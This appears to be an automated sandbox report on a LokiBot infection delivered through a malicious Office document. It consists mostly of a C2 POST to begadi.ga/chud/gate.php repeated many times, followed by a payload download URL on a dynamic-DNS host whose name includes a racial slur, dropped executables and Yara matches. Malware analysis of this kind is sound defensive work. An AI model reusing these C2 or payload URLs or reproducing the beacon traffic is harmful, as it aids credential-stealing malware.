Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00404ED4 recv,

5_2_00404ED4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9981CA08.emf

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /secure/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chnesstdyqudusisabadassniggainthestfmv.ydns.euConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: chnesstdyqudusisabadassniggainthestfmv.ydns.eu

Source: unknown

HTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 176Connection: close

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Dec 2020 07:33:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/7.3.24RC1Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: vbc.exe, 00000005.00000002.2391453464.000000000049F000.00000040.00000001.sdmp	String found in binary or memory: http://begadi.ga/chud/gate.php
Source: vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, vbc.exe, 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: document is protected 16 ~ 17 18 19 20 21 Open the document In If this document was 22 Micr
Source: Screenshot number: 4	Screenshot OCR: protected documents the yellow bar above 25 26 27 28 :: 31 0 0 0 0 0 q 32 " 33 0 0 0 0 0 q

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
